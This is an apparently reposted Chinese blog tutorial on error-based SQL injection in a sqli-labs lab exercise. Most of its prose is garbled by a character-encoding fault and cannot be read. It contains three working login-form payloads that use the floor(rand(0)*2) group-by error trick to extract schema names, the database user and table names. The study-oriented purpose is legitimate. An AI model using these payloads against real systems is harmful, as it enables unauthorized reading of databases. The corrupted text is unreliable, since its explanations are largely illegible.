SQL鎶ラ敊娉ㄥ叆
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL鎶ラ敊娉ㄥ叆相关的知识,希望对你有一定的参考价值。
鏍囩锛?a href='http://www.mamicode.com/so/1/%e4%ba%86%e8%a7%a3' title='浜嗚В'>浜嗚В htm html sel 瀹樻柟 閬囧埌 select img inf
0x00锛氬墠瑷€
sqli-libs绗?1鍏崇殑鎶ラ敊娉ㄥ叆锛屼箣鍓嶆病鏈夊叿浣撳涔犱簡瑙h繃锛屾墍浠ュ崟鐙涔犱竴涓嬨€?/p>
0x01锛氫緥瀛?/h3>
uname=1&passwd=
1鈥?union select count(*),concat(0x3a,0x3a,(select group_concat(schema_name) from information_schema.schemata),0x3a,0x3a,floor(rand(0)*2))a from information_schema.schemata group by a#
uname=1&passwd=
1鈥?union select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.columns group by x#
uname=1&passwd=1鈥?union select count(*),concat(0x3a,0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=鈥榮ecurity鈥?,0x3a,0x3a,floor(rand(0)*2))a from information_schema.tables group by a#
璇彞璁茶В
锛?锛塩ount(*)瀵规暟鐩繘琛岃璁$畻
锛?锛塺and()
鐢熸垚≥a涓?le;b鐨勯殢鏈烘暟
x=a
y=(b-a)+1
select floor(x+rand()*y);
select floor(2+rand()*9);锛?≤x≤10锛?/p>
rand()鍙互鍦ㄧ敓鎴?鍜?涔嬮棿闅忔満鏁?/p>
rand(0)鐢熸垚涓€涓殢鏈哄€?/p>
floor()杩斿洖灏忎簬绛変簬璇ュ€肩殑鏈€澶ф暣鏁帮紱floor(rand()*2)杩斿洖0鍒?杩欎釜鏁帮紱涔熷氨鏄?鎴?
锛?锛塯roup by
涓昏鐢ㄦ潵瀵规暟鎹繘琛屽垎缁勶紙鐩稿悓鐨勫垎涓轰竴缁勶級锛?/p>
group by銆傛牴鎹€у埆鍙垎浜嗕袱缁?/p>
group by 鍜?count(*)
鍒嗙粍涔嬪悗锛屽姣忎竴涓垎缁勮鏁?/p>
group by 鍜宑ount(*)浼氬缓绔嬩竴涓櫄鎷熻〃锛宬ey鍜宑ount(*),key涓嶅彲閲嶅锛屾煡璇㈢殑鏃跺€欓亣鍒発ey灏眂ount(*)+1
0x02锛歠loor(rand(0)*2)鎶ラ敊
鍏跺疄mysql瀹樻柟鏈夌粰杩囨彁绀猴紝灏辨槸鏌ヨ鐨勬椂鍊欏鏋滀娇鐢╮and()鐨勮瘽锛岃鍊间細琚绠楀娆★紝閭h繖涓?ldquo;琚绠楀娆?rdquo;鍒板簳鏄粈涔堟剰鎬濓紝灏辨槸鍦ㄤ娇鐢╣roup by鐨勬椂鍊欙紝floor(rand(0)*2)浼氳鎵ц涓€娆★紝濡傛灉铏氳〃涓嶅瓨鍦ㄨ褰曪紝鎻掑叆铏氳〃鐨勬椂鍊欎細鍐嶈鎵ц涓€娆★紝鎴戜滑鏉ョ湅涓媐loor(rand(0)*2)鎶ラ敊鐨勮繃绋嬪氨鐭ラ亾浜嗭紝浠?x04鍙互鐪嬪埌鍦ㄤ竴娆″璁板綍鐨勬煡璇㈣繃绋嬩腑floor(rand(0)*2)鐨勫€兼槸瀹氭€х殑锛屼负011011…(璁颁綇杩欎釜椤哄簭寰堥噸瑕?锛屾姤閿欏疄闄呬笂灏辨槸floor(rand(0)*2)琚绠楀娆″鑷寸殑銆?/p>
鍙傝€冩枃绔狅細https://www.cnblogs.com/xdans/p/5412468.html
以上是关于SQL鎶ラ敊娉ㄥ叆的主要内容,如果未能解决你的问题,请参考以下文章